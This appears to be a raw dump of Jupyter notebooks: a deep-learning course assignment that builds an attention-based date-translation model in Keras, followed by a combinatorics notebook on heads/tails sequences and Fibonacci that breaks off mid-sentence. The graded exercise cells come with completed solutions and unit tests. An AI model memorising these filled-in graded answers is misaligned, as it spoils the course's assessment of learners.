"# UNQ_C2 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)\n# GRADED FUNCTION: model\n\ndef modelf(Tx, Ty, n_a, n_s, human_vocab_size, machine_vocab_size):\n \"\"\"\n Arguments:\n Tx -- length of the input sequence\n Ty -- length of the output sequence\n n_a -- hidden state size of the Bi-LSTM\n n_s -- hidden state size of the post-attention LSTM\n human_vocab_size -- size of the python dictionary \"human_vocab\"\n machine_vocab_size -- size of the python dictionary \"machine_vocab\"\n\n Returns:\n model -- Keras model instance\n \"\"\"\n \n # Define the inputs of your model with a shape (Tx,)\n # Define s0 (initial hidden state) and c0 (initial cell state)\n # for the decoder LSTM with shape (n_s,)\n X = Input(shape=(Tx, human_vocab_size))\n s0 = Input(shape=(n_s,), name='s0')\n c0 = Input(shape=(n_s,), name='c0')\n s = s0\n c = c0\n \n # Initialize empty list of outputs\n outputs = []\n \n ### START CODE HERE ###\n \n # Step 1: Define your pre-attention Bi-LSTM. (≈ 1 line)\n a = Bidirectional(LSTM(units=n_a, return_sequences=True))(X)\n \n # Step 2: Iterate for Ty steps\n for t in range(Ty):\n \n # Step 2.A: Perform one step of the attention mechanism to get back the context vector at step t (≈ 1 line)\n context = one_step_attention(a, s)\n \n # Step 2.B: Apply the post-attention LSTM cell to the \"context\" vector.\n # Don't forget to pass: initial_state = [hidden state, cell state] (≈ 1 line)\n s, _, c = post_activation_LSTM_cell(context, initial_state=[s, c])\n \n # Step 2.C: Apply Dense layer to the hidden state output of the post-attention LSTM (≈ 1 line)\n out = output_layer(s)\n \n # Step 2.D: Append \"out\" to the \"outputs\" list (≈ 1 line)\n outputs.append(out)\n \n # Step 3: Create model instance taking three inputs and returning the list of outputs. (≈ 1 line)\n model = Model(inputs=[X, s0, c0], outputs=outputs)\n \n ### END CODE HERE ###\n \n return model",
"_____no_output_____"
],
[
"# UNIT TEST\nfrom test_utils import *\n\ndef modelf_test(target):\n m = 10\n Tx = 30\n n_a = 32\n n_s = 64\n len_human_vocab = 37\n len_machine_vocab = 11\n \n \n model = target(Tx, Ty, n_a, n_s, len_human_vocab, len_machine_vocab)\n \n print(summary(model))\n\n \n expected_summary = [['InputLayer', [(None, 30, 37)], 0],\n ['InputLayer', [(None, 64)], 0],\n ['Bidirectional', (None, 30, 64), 17920],\n ['RepeatVector', (None, 30, 64), 0, 30],\n ['Concatenate', (None, 30, 128), 0],\n ['Dense', (None, 30, 10), 1290, 'tanh'],\n ['Dense', (None, 30, 1), 11, 'relu'],\n ['Activation', (None, 30, 1), 0],\n ['Dot', (None, 1, 64), 0],\n ['InputLayer', [(None, 64)], 0],\n ['LSTM',[(None, 64), (None, 64), (None, 64)], 33024,[(None, 1, 64), (None, 64), (None, 64)],'tanh'],\n ['Dense', (None, 11), 715, 'softmax']]\n\n assert len(model.outputs) == 10, f\"Wrong output shape. Expected 10 != {len(model.outputs)}\"\n\n comparator(summary(model), expected_summary)\n \n\nmodelf_test(modelf)",
"[['InputLayer', [(None, 30, 37)], 0], ['InputLayer', [(None, 64)], 0], ['Bidirectional', (None, 30, 64), 17920], ['RepeatVector', (None, 30, 64), 0, 30], ['Concatenate', (None, 30, 128), 0], ['Dense', (None, 30, 10), 1290, 'tanh'], ['Dense', (None, 30, 1), 11, 'relu'], ['Activation', (None, 30, 1), 0], ['Dot', (None, 1, 64), 0], ['InputLayer', [(None, 64)], 0], ['LSTM', [(None, 64), (None, 64), (None, 64)], 33024, [(None, 1, 64), (None, 64), (None, 64)], 'tanh'], ['Dense', (None, 11), 715, 'softmax']]\n\u001b[32mAll tests passed!\u001b[0m\n"
]
],
[
[
"Run the following cell to create your model.",
"_____no_output_____"
]
],
[
[
"model = modelf(Tx, Ty, n_a, n_s, len(human_vocab), len(machine_vocab))",
"_____no_output_____"
]
],
[
[
"#### Troubleshooting Note\n* If you are getting repeated errors after an initially incorrect implementation of \"model\", but believe that you have corrected the error, you may still see error messages when building your model. \n* A solution is to save and restart your kernel (or shutdown then restart your notebook), and re-run the cells.",
"_____no_output_____"
],
[
"Let's get a summary of the model to check if it matches the expected output.",
"_____no_output_____"
]
],
[
[
"model.summary()",
"Model: \"functional_13\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_9 (InputLayer) [(None, 30, 37)] 0 \n__________________________________________________________________________________________________\ns0 (InputLayer) [(None, 64)] 0 \n__________________________________________________________________________________________________\nbidirectional_8 (Bidirectional) (None, 30, 64) 17920 input_9[0][0] \n__________________________________________________________________________________________________\nrepeat_vector_1 (RepeatVector) (None, 30, 64) 0 s0[0][0] \n lstm_3[60][0] \n lstm_3[61][0] \n lstm_3[62][0] \n lstm_3[63][0] \n lstm_3[64][0] \n lstm_3[65][0] \n lstm_3[66][0] \n lstm_3[67][0] \n lstm_3[68][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 30, 128) 0 bidirectional_8[0][0] \n repeat_vector_1[61][0] \n bidirectional_8[0][0] \n repeat_vector_1[62][0] \n bidirectional_8[0][0] \n repeat_vector_1[63][0] \n bidirectional_8[0][0] \n repeat_vector_1[64][0] \n bidirectional_8[0][0] \n repeat_vector_1[65][0] \n bidirectional_8[0][0] \n repeat_vector_1[66][0] \n bidirectional_8[0][0] \n repeat_vector_1[67][0] \n bidirectional_8[0][0] \n repeat_vector_1[68][0] \n bidirectional_8[0][0] \n repeat_vector_1[69][0] \n bidirectional_8[0][0] \n repeat_vector_1[70][0] \n__________________________________________________________________________________________________\ndense_2 (Dense) (None, 30, 10) 1290 concatenate_1[61][0] \n concatenate_1[62][0] \n concatenate_1[63][0] \n concatenate_1[64][0] \n concatenate_1[65][0] \n concatenate_1[66][0] \n concatenate_1[67][0] \n concatenate_1[68][0] \n concatenate_1[69][0] \n concatenate_1[70][0] \n__________________________________________________________________________________________________\ndense_3 (Dense) (None, 30, 1) 11 dense_2[61][0] \n dense_2[62][0] \n dense_2[63][0] \n dense_2[64][0] \n dense_2[65][0] \n dense_2[66][0] \n dense_2[67][0] \n dense_2[68][0] \n dense_2[69][0] \n dense_2[70][0] \n__________________________________________________________________________________________________\nattention_weights (Activation) (None, 30, 1) 0 dense_3[61][0] \n dense_3[62][0] \n dense_3[63][0] \n dense_3[64][0] \n dense_3[65][0] \n dense_3[66][0] \n dense_3[67][0] \n dense_3[68][0] \n dense_3[69][0] \n dense_3[70][0] \n__________________________________________________________________________________________________\ndot_1 (Dot) (None, 1, 64) 0 attention_weights[61][0] \n bidirectional_8[0][0] \n attention_weights[62][0] \n bidirectional_8[0][0] \n attention_weights[63][0] \n bidirectional_8[0][0] \n attention_weights[64][0] \n bidirectional_8[0][0] \n attention_weights[65][0] \n bidirectional_8[0][0] \n attention_weights[66][0] \n bidirectional_8[0][0] \n attention_weights[67][0] \n bidirectional_8[0][0] \n attention_weights[68][0] \n bidirectional_8[0][0] \n attention_weights[69][0] \n bidirectional_8[0][0] \n attention_weights[70][0] \n bidirectional_8[0][0] \n__________________________________________________________________________________________________\nc0 (InputLayer) [(None, 64)] 0 \n__________________________________________________________________________________________________\nlstm_3 (LSTM) [(None, 64), (None, 33024 dot_1[61][0] \n s0[0][0] 
\n c0[0][0] \n dot_1[62][0] \n lstm_3[60][0] \n lstm_3[60][2] \n dot_1[63][0] \n lstm_3[61][0] \n lstm_3[61][2] \n dot_1[64][0] \n lstm_3[62][0] \n lstm_3[62][2] \n dot_1[65][0] \n lstm_3[63][0] \n lstm_3[63][2] \n dot_1[66][0] \n lstm_3[64][0] \n lstm_3[64][2] \n dot_1[67][0] \n lstm_3[65][0] \n lstm_3[65][2] \n dot_1[68][0] \n lstm_3[66][0] \n lstm_3[66][2] \n dot_1[69][0] \n lstm_3[67][0] \n lstm_3[67][2] \n dot_1[70][0] \n lstm_3[68][0] \n lstm_3[68][2] \n__________________________________________________________________________________________________\ndense_5 (Dense) (None, 11) 715 lstm_3[60][0] \n lstm_3[61][0] \n lstm_3[62][0] \n lstm_3[63][0] \n lstm_3[64][0] \n lstm_3[65][0] \n lstm_3[66][0] \n lstm_3[67][0] \n lstm_3[68][0] \n lstm_3[69][0] \n==================================================================================================\nTotal params: 52,960\nTrainable params: 52,960\nNon-trainable params: 0\n__________________________________________________________________________________________________\n"
]
],
[
[
"**Expected Output**:\n\nHere is the summary you should see\n<table>\n <tr>\n <td>\n **Total params:**\n </td>\n <td>\n 52,960\n </td>\n </tr>\n <tr>\n <td>\n **Trainable params:**\n </td>\n <td>\n 52,960\n </td>\n </tr>\n <tr>\n <td>\n **Non-trainable params:**\n </td>\n <td>\n 0\n </td>\n </tr>\n <tr>\n <td>\n **bidirectional_1's output shape **\n </td>\n <td>\n (None, 30, 64) \n </td>\n </tr>\n <tr>\n <td>\n **repeat_vector_1's output shape **\n </td>\n <td>\n (None, 30, 64) \n </td>\n </tr>\n <tr>\n <td>\n **concatenate_1's output shape **\n </td>\n <td>\n (None, 30, 128) \n </td>\n </tr>\n <tr>\n <td>\n **attention_weights's output shape **\n </td>\n <td>\n (None, 30, 1) \n </td>\n </tr>\n <tr>\n <td>\n **dot_1's output shape **\n </td>\n <td>\n (None, 1, 64)\n </td>\n </tr>\n <tr>\n <td>\n **dense_3's output shape **\n </td>\n <td>\n (None, 11) \n </td>\n </tr>\n</table>\n",
"_____no_output_____"
],
[
"<a name='ex-3'></a>\n### Exercise 3 - Compile the Model\n\n* After creating your model in Keras, you need to compile it and define the loss function, optimizer and metrics you want to use. \n * Loss function: 'categorical_crossentropy'.\n * Optimizer: [Adam](https://keras.io/optimizers/#adam) [optimizer](https://keras.io/optimizers/#usage-of-optimizers)\n - learning rate = 0.005 \n - $\\beta_1 = 0.9$\n - $\\beta_2 = 0.999$\n - decay = 0.01 \n * metric: 'accuracy'\n \nSample code\n```Python\noptimizer = Adam(lr=..., beta_1=..., beta_2=..., decay=...)\nmodel.compile(optimizer=..., loss=..., metrics=[...])\n```",
"_____no_output_____"
]
],
[
[
"### START CODE HERE ### (≈2 lines)\nopt = Adam(lr=0.005, beta_1=0.9, beta_2=0.999, decay=0.01) \nmodel.compile(loss = 'categorical_crossentropy', optimizer = opt, metrics = ['accuracy'])\n### END CODE HERE ###",
"_____no_output_____"
],
[
"# UNIT TESTS\nassert opt.lr == 0.005, \"Set the lr parameter to 0.005\"\nassert opt.beta_1 == 0.9, \"Set the beta_1 parameter to 0.9\"\nassert opt.beta_2 == 0.999, \"Set the beta_2 parameter to 0.999\"\nassert opt.decay == 0.01, \"Set the decay parameter to 0.01\"\nassert model.loss == \"categorical_crossentropy\", \"Wrong loss. Use 'categorical_crossentropy'\"\nassert model.optimizer == opt, \"Use the optimizer that you have instantiated\"\nassert model.compiled_metrics._user_metrics[0] == 'accuracy', \"set metrics to ['accuracy']\"\n\nprint(\"\\033[92mAll tests passed!\")",
"\u001b[92mAll tests passed!\n"
]
],
[
[
"#### Define inputs and outputs, and fit the model\nThe last step is to define all your inputs and outputs to fit the model:\n- You have input X of shape $(m = 10000, T_x = 30)$ containing the training examples.\n- You need to create `s0` and `c0` to initialize your `post_attention_LSTM_cell` with zeros.\n- Given the `model()` you coded, you need the \"outputs\" to be a list of 10 elements of shape (m, T_y). \n - The list `outputs[i][0], ..., outputs[i][Ty]` represents the true labels (characters) corresponding to the $i^{th}$ training example (`X[i]`). \n - `outputs[i][j]` is the true label of the $j^{th}$ character in the $i^{th}$ training example.",
"_____no_output_____"
]
],
[
[
"s0 = np.zeros((m, n_s))\nc0 = np.zeros((m, n_s))\noutputs = list(Yoh.swapaxes(0,1))",
"_____no_output_____"
]
],
[
[
"Let's now fit the model and run it for one epoch.",
"_____no_output_____"
]
],
[
[
"model.fit([Xoh, s0, c0], outputs, epochs=1, batch_size=100)",
"100/100 [==============================] - 10s 101ms/step - loss: 16.5259 - dense_5_loss: 1.2274 - dense_5_1_loss: 0.9505 - dense_5_2_loss: 1.7137 - dense_5_3_loss: 2.6582 - dense_5_4_loss: 0.7633 - dense_5_5_loss: 1.2655 - dense_5_6_loss: 2.7714 - dense_5_7_loss: 0.9110 - dense_5_8_loss: 1.7310 - dense_5_9_loss: 2.5339 - dense_5_accuracy: 0.5007 - dense_5_1_accuracy: 0.7171 - dense_5_2_accuracy: 0.3122 - dense_5_3_accuracy: 0.0918 - dense_5_4_accuracy: 0.9454 - dense_5_5_accuracy: 0.3345 - dense_5_6_accuracy: 0.0512 - dense_5_7_accuracy: 0.9499 - dense_5_8_accuracy: 0.2543 - dense_5_9_accuracy: 0.1094\n"
]
],
[
[
"While training you can see the loss as well as the accuracy on each of the 10 positions of the output. The table below gives you an example of what the accuracies could be if the batch had 2 examples: \n\n<img src=\"images/table.png\" style=\"width:700;height:200px;\"> <br>\n<caption><center>Thus, `dense_2_acc_8: 0.89` means that you are predicting the 7th character of the output correctly 89% of the time in the current batch of data. </center></caption>\n\n\nWe have run this model for longer, and saved the weights. Run the next cell to load our weights. (By training a model for several minutes, you should be able to obtain a model of similar accuracy, but loading our model will save you time.) ",
"_____no_output_____"
]
],
[
[
"model.load_weights('models/model.h5')",
"_____no_output_____"
]
],
[
[
"You can now see the results on new examples.",
"_____no_output_____"
]
],
[
[
"EXAMPLES = ['3 May 1979', '5 April 09', '21th of August 2016', 'Tue 10 Jul 2007', 'Saturday May 9 2018', 'March 3 2001', 'March 3rd 2001', '1 March 2001']\ns00 = np.zeros((1, n_s))\nc00 = np.zeros((1, n_s))\nfor example in EXAMPLES:\n source = string_to_int(example, Tx, human_vocab)\n #print(source)\n source = np.array(list(map(lambda x: to_categorical(x, num_classes=len(human_vocab)), source))).swapaxes(0,1)\n source = np.swapaxes(source, 0, 1)\n source = np.expand_dims(source, axis=0)\n prediction = model.predict([source, s00, c00])\n prediction = np.argmax(prediction, axis = -1)\n output = [inv_machine_vocab[int(i)] for i in prediction]\n print(\"source:\", example)\n print(\"output:\", ''.join(output),\"\\n\")",
"source: 3 May 1979\noutput: 1979-05-33 \n\nsource: 5 April 09\noutput: 2009-04-05 \n\nsource: 21th of August 2016\noutput: 2016-08-20 \n\nsource: Tue 10 Jul 2007\noutput: 2007-07-10 \n\nsource: Saturday May 9 2018\noutput: 2018-05-09 \n\nsource: March 3 2001\noutput: 2001-03-03 \n\nsource: March 3rd 2001\noutput: 2001-03-03 \n\nsource: 1 March 2001\noutput: 2001-03-01 \n\n"
]
],
[
[
"You can also change these examples to test with your own examples. The next part will give you a better sense of what the attention mechanism is doing--i.e., what part of the input the network is paying attention to when generating a particular output character. ",
"_____no_output_____"
],
[
"<a name='3'></a>\n## 3 - Visualizing Attention (Optional / Ungraded)\n\nSince the problem has a fixed output length of 10, it is also possible to carry out this task using 10 different softmax units to generate the 10 characters of the output. But one advantage of the attention model is that each part of the output (such as the month) knows it needs to depend only on a small part of the input (the characters in the input giving the month). We can visualize what each part of the output is looking at which part of the input.\n\nConsider the task of translating \"Saturday 9 May 2018\" to \"2018-05-09\". If we visualize the computed $\\alpha^{\\langle t, t' \\rangle}$ we get this: \n\n<img src=\"images/date_attention.png\" style=\"width:600;height:300px;\"> <br>\n<caption><center> **Figure 8**: Full Attention Map</center></caption>\n\nNotice how the output ignores the \"Saturday\" portion of the input. None of the output timesteps are paying much attention to that portion of the input. We also see that 9 has been translated as 09 and May has been correctly translated into 05, with the output paying attention to the parts of the input it needs to to make the translation. The year mostly requires it to pay attention to the input's \"18\" in order to generate \"2018.\" ",
"_____no_output_____"
],
[
"<a name='3-1'></a>\n### 3.1 - Getting the Attention Weights From the Network\n\nLets now visualize the attention values in your network. We'll propagate an example through the network, then visualize the values of $\\alpha^{\\langle t, t' \\rangle}$. \n\nTo figure out where the attention values are located, let's start by printing a summary of the model .",
"_____no_output_____"
]
],
[
[
"model.summary()",
"Model: \"functional_13\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_9 (InputLayer) [(None, 30, 37)] 0 \n__________________________________________________________________________________________________\ns0 (InputLayer) [(None, 64)] 0 \n__________________________________________________________________________________________________\nbidirectional_8 (Bidirectional) (None, 30, 64) 17920 input_9[0][0] \n__________________________________________________________________________________________________\nrepeat_vector_1 (RepeatVector) (None, 30, 64) 0 s0[0][0] \n lstm_3[60][0] \n lstm_3[61][0] \n lstm_3[62][0] \n lstm_3[63][0] \n lstm_3[64][0] \n lstm_3[65][0] \n lstm_3[66][0] \n lstm_3[67][0] \n lstm_3[68][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 30, 128) 0 bidirectional_8[0][0] \n repeat_vector_1[61][0] \n bidirectional_8[0][0] \n repeat_vector_1[62][0] \n bidirectional_8[0][0] \n repeat_vector_1[63][0] \n bidirectional_8[0][0] \n repeat_vector_1[64][0] \n bidirectional_8[0][0] \n repeat_vector_1[65][0] \n bidirectional_8[0][0] \n repeat_vector_1[66][0] \n bidirectional_8[0][0] \n repeat_vector_1[67][0] \n bidirectional_8[0][0] \n repeat_vector_1[68][0] \n bidirectional_8[0][0] \n repeat_vector_1[69][0] \n bidirectional_8[0][0] \n repeat_vector_1[70][0] \n__________________________________________________________________________________________________\ndense_2 (Dense) (None, 30, 10) 1290 concatenate_1[61][0] \n concatenate_1[62][0] \n concatenate_1[63][0] \n concatenate_1[64][0] \n concatenate_1[65][0] \n concatenate_1[66][0] \n concatenate_1[67][0] \n concatenate_1[68][0] \n concatenate_1[69][0] \n concatenate_1[70][0] \n__________________________________________________________________________________________________\ndense_3 (Dense) (None, 30, 1) 11 dense_2[61][0] \n dense_2[62][0] \n dense_2[63][0] \n dense_2[64][0] \n dense_2[65][0] \n dense_2[66][0] \n dense_2[67][0] \n dense_2[68][0] \n dense_2[69][0] \n dense_2[70][0] \n__________________________________________________________________________________________________\nattention_weights (Activation) (None, 30, 1) 0 dense_3[61][0] \n dense_3[62][0] \n dense_3[63][0] \n dense_3[64][0] \n dense_3[65][0] \n dense_3[66][0] \n dense_3[67][0] \n dense_3[68][0] \n dense_3[69][0] \n dense_3[70][0] \n__________________________________________________________________________________________________\ndot_1 (Dot) (None, 1, 64) 0 attention_weights[61][0] \n bidirectional_8[0][0] \n attention_weights[62][0] \n bidirectional_8[0][0] \n attention_weights[63][0] \n bidirectional_8[0][0] \n attention_weights[64][0] \n bidirectional_8[0][0] \n attention_weights[65][0] \n bidirectional_8[0][0] \n attention_weights[66][0] \n bidirectional_8[0][0] \n attention_weights[67][0] \n bidirectional_8[0][0] \n attention_weights[68][0] \n bidirectional_8[0][0] \n attention_weights[69][0] \n bidirectional_8[0][0] \n attention_weights[70][0] \n bidirectional_8[0][0] \n__________________________________________________________________________________________________\nc0 (InputLayer) [(None, 64)] 0 \n__________________________________________________________________________________________________\nlstm_3 (LSTM) [(None, 64), (None, 33024 dot_1[61][0] \n s0[0][0] 
\n c0[0][0] \n dot_1[62][0] \n lstm_3[60][0] \n lstm_3[60][2] \n dot_1[63][0] \n lstm_3[61][0] \n lstm_3[61][2] \n dot_1[64][0] \n lstm_3[62][0] \n lstm_3[62][2] \n dot_1[65][0] \n lstm_3[63][0] \n lstm_3[63][2] \n dot_1[66][0] \n lstm_3[64][0] \n lstm_3[64][2] \n dot_1[67][0] \n lstm_3[65][0] \n lstm_3[65][2] \n dot_1[68][0] \n lstm_3[66][0] \n lstm_3[66][2] \n dot_1[69][0] \n lstm_3[67][0] \n lstm_3[67][2] \n dot_1[70][0] \n lstm_3[68][0] \n lstm_3[68][2] \n__________________________________________________________________________________________________\ndense_5 (Dense) (None, 11) 715 lstm_3[60][0] \n lstm_3[61][0] \n lstm_3[62][0] \n lstm_3[63][0] \n lstm_3[64][0] \n lstm_3[65][0] \n lstm_3[66][0] \n lstm_3[67][0] \n lstm_3[68][0] \n lstm_3[69][0] \n==================================================================================================\nTotal params: 52,960\nTrainable params: 52,960\nNon-trainable params: 0\n__________________________________________________________________________________________________\n"
]
],
[
[
"Navigate through the output of `model.summary()` above. You can see that the layer named `attention_weights` outputs the `alphas` of shape (m, 30, 1) before `dot_2` computes the context vector for every time step $t = 0, \\ldots, T_y-1$. Let's get the attention weights from this layer.\n\nThe function `attention_map()` pulls out the attention values from your model and plots them.\n\n**Note**: We are aware that you might run into an error running the cell below despite a valid implementation for Exercise 2 - `modelf` above. If you get the error kindly report it on this [Topic](https://discourse.deeplearning.ai/t/error-in-optional-ungraded-part-of-neural-machine-translation-w3a1/1096) on [Discourse](https://discourse.deeplearning.ai) as it'll help us improve our content. \n\nIf you haven’t joined our Discourse community you can do so by clicking on the link: http://bit.ly/dls-discourse\n\nAnd don’t worry about the error, it will not affect the grading for this assignment.",
"_____no_output_____"
]
],
[
[
"attention_map = plot_attention_map(model, human_vocab, inv_machine_vocab, \"Tuesday 09 Oct 1993\", num = 7, n_s = 64);",
"_____no_output_____"
]
],
[
[
"On the generated plot you can observe the values of the attention weights for each character of the predicted output. Examine this plot and check that the places where the network is paying attention makes sense to you.\n\nIn the date translation application, you will observe that most of the time attention helps predict the year, and doesn't have much impact on predicting the day or month.",
"_____no_output_____"
],
[
"### Congratulations!\n\n\nYou have come to the end of this assignment \n\n#### Here's what you should remember\n\n- Machine translation models can be used to map from one sequence to another. They are useful not just for translating human languages (like French->English) but also for tasks like date format translation. \n- An attention mechanism allows a network to focus on the most relevant parts of the input when producing a specific part of the output. \n- A network using an attention mechanism can translate from inputs of length $T_x$ to outputs of length $T_y$, where $T_x$ and $T_y$ can be different. \n- You can visualize attention weights $\\alpha^{\\langle t,t' \\rangle}$ to see what the network is paying attention to while generating each output.",
"_____no_output_____"
],
[
"Congratulations on finishing this assignment! You are now able to implement an attention model and use it to learn complex mappings from one sequence to another. ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e7060a370da0e3cb27ad380125125296155ad6c1 | 46,923 | ipynb | Jupyter Notebook | Mathematics/Statistics/Statistics and Probability Python Notebooks/Combinatorics, Probability, and Stats/Heads_or_tails.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | null | null | null | Mathematics/Statistics/Statistics and Probability Python Notebooks/Combinatorics, Probability, and Stats/Heads_or_tails.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | null | null | null | Mathematics/Statistics/Statistics and Probability Python Notebooks/Combinatorics, Probability, and Stats/Heads_or_tails.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | 2 | 2022-02-09T15:41:33.000Z | 2022-02-11T07:47:40.000Z | 30.059577 | 299 | 0.375488 | [
[
[
"## Import dependencies",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom numpy.linalg import matrix_power\nfrom scipy.special import comb\nfrom scipy.signal import convolve2d\nfrom sklearn.preprocessing import minmax_scale",
"_____no_output_____"
]
],
[
[
"## Define functions",
"_____no_output_____"
]
],
[
[
"def drawHeatmapMatrix(M, labels, xlabels, ylabels, \n contrast=1/200, \n format='.2f', \n cmap = \"Blues\",\n normalize = 'rows',\n cbar = True):\n M2 = convolve2d(M, np.array([[-1,-3,-1],[-3,17,-3],[-1,-3,-1]]), mode = 'same', boundary=\"symm\")\n\n if normalize == 'all':\n # scale to actual range\n hi=np.max(M)\n lo=np.min(M)\n M2 = M2*contrast+M \n M2 = (M2-np.min(M2))/(np.max(M2)-np.min(M2))*(hi-lo)+lo\n elif normalize == 'columns':\n M2 = minmax_scale(M2*contrast+M, feature_range=(np.min(M), np.max(M)), axis=0)\n else:\n # scaling by columns or rows:\n M2 = minmax_scale(M2*contrast+M, feature_range=(np.min(M), np.max(M)), axis=1)\n\n sns.heatmap(M2,\n annot = labels,\n center = 0.1, \n fmt = format,\n square = True, \n linewidths = 2,\n robust = True,\n xticklabels = xlabels,\n yticklabels = ylabels,\n cmap = cmap,\n cbar = cbar, \n #cbar_kws = dict(ticks=[.0, .25, .5], shrink=0.82) \n cbar_kws = dict(shrink=0.82)\n )",
"_____no_output_____"
]
],
[
[
"# Brute Force\nA sequence of $N$ head or tails outcomes can be represented as a binary number in the range $[0, 2^{N}-1]$, e.g. $01111 11111$ would mean a head followed by nine tails. \n\nThe following code lists all combinations using binary numbers head=0 and tail=1.",
"_____no_output_____"
]
],
[
[
"# total number of trials\nN = 10\nlabels = {'0': \"heads\", '1': \"tails\"}\n\n# for converting an integer into a binary representation string:\nfmt = \"{:0\"+str(N)+\"b}\"\n\n# list all posibilities\narr = [fmt.format(n) for n in range(2**N)]\n# no cats next to one another:\narr = [st for st in arr if '00' not in st]\n\ndf = pd.DataFrame(dict(Arrangements = arr))\ndf.index += 1\ndisplay(df)\nprint(\"In total {} combinations.\".format(len(arr)))",
"_____no_output_____"
]
],
[
[
"## Label the Tabel of Options",
"_____no_output_____"
]
],
[
[
"# convert integer into a string sequence:\narrT = np.array([[labels.get(x) for x in st] for st in arr]).T\ndf = pd.DataFrame(dict([(k,v) for k,v in enumerate(arrT, start=1)]))\ndf.index += 1\ndisplay(df)",
"_____no_output_____"
]
],
[
[
"Count frequences and ratio",
"_____no_output_____"
]
],
[
[
"from collections import Counter\ncn = Counter()\n[cn.update(v) for v in arrT]\nprint(cn)\nheads = cn['heads']\ntails = cn['tails']\ntotal = heads+tails\n\nprint(\"Ratio heads/tails: {}\".format(heads/tails)) # 0.39285845418023574\nprint(\"heads: {:.2f}%\".format(100*heads/tails))\nprint(\"tails: {:.2f}%\".format(100*tails/tails))",
"Counter({'tails': 1020, 'heads': 420})\nRatio heads/tails: 0.4117647058823529\nheads: 41.18%\ntails: 100.00%\n"
]
],
[
[
"# Combinatorics\nIn this block we will calculate the number using combinatorics, e.g. using the [Stars and bars](https://en.wikipedia.org/wiki/Stars_and_bars_(combinatorics)) principle.\n\nLike for instance, if there was $t=7$ tails, there are $t-1=6$ gaps between them, one position at the left end, and one at the right end. These will be the $t+1=8$ positions where the $N-t=3$ tails can be placed.\n",
"_____no_output_____"
],
[
"So we are placing $N-t=3$ heads in $t+1=8$ positions. Since the order of the heads does not matter, there are \n${t+1 \\choose N-t} = {8 \\choose 3} = 56$ ways to choose the heads positions.\n\nThe table below shows the number of arrangements as a function of number of tails:\n",
"_____no_output_____"
]
],
[
[
"N = 10\n\n# function comb returns zero for illegal cases like (4 choose 6)\narr = [int(comb(t+1,N-t)) for t in range(0,N+1)]\n\ndf = pd.DataFrame({\"tails\": range(0,N+1), \"Arrangements\":arr, })\ndf.index = df['tails']\ndel df[\"tails\"]\ndisplay(df)",
"_____no_output_____"
]
],
[
[
"Next, if we wanted to count the total number of all arrangements, we will sum over all the possible amounts of dogs $d \\in [{\\lfloor}N/2{\\rfloor}, N]$ which is given by the following formula:\n\n$\\sum_{d={\\lfloor}N/2{\\rfloor}}^N {d+1 \\choose N-d}$\n\nThe cell below calculates the total number of arrangements when $N=10$.\n",
"_____no_output_____"
]
],
[
[
"N = 10\nsum([int(comb(t+1,N-t)) for t in range(N+1)])",
"_____no_output_____"
]
],
[
[
"The answer $144$ is interesting, after realizing e.g. that $144=12^2$, one might start wondering what is the formula in a general case, e.g. what is the answer as a function of $N$.\n\nThe cell below calculates the answer when the number of animals when $1\\leq N \\leq 15$:",
"_____no_output_____"
]
],
[
[
"Ns = []\nSums = []\nfor N in range(1, 16):\n Ns.append(N)\n Sums.append(sum([int(comb(t+1,N-t)) for t in range(0,N+1)]))\n\ndf = pd.DataFrame()\ndf['Length'] = Ns\ndf['Combinations'] = Sums\ndf.index += 1\ndisplay(df)",
"_____no_output_____"
]
],
[
[
"## Fibonacci \n",
"_____no_output_____"
],
[
"# Solving the Recurrence Equation with Linear Algebra\nTo study further the appearing of the Fibonacci Sequence I chose to solve the recurrence problem using Linear Algebra.\nThe model is such that we mark the number of possible rows of outcomes where the last outcome is a tails with $t_n$, and likewise for rows with a heads at the end with $h_n$, a vector $v_n$ is formed by the two variables:\n\n$v_n = \\begin{bmatrix} t_n \\\\ h_n \\end{bmatrix}$\n\nThe initial value $v_0 = [1,1]^T$ tells that with a row of one animal there are mutual changes of the chosen animal being a heads or tails.\n\nTo build the recurrence, lets calculate the next $v_{n+1}$ in the sequence by:\n\n$v_{n+1} = \\begin{bmatrix} t_{n+1} \\\\ h_{n+1} \\end{bmatrix} = \n\\begin{bmatrix} 1 & 1 \\\\ 1 & 0 \\end{bmatrix} \\cdot\n\\begin{bmatrix} t_n \\\\ h_n \\end{bmatrix} = A \\cdot v_n\n$\n\nBecause both the rows ending with a heads or tails can be extended with a tails, are the top row values in the matrix $A$ both equal to 1. On the 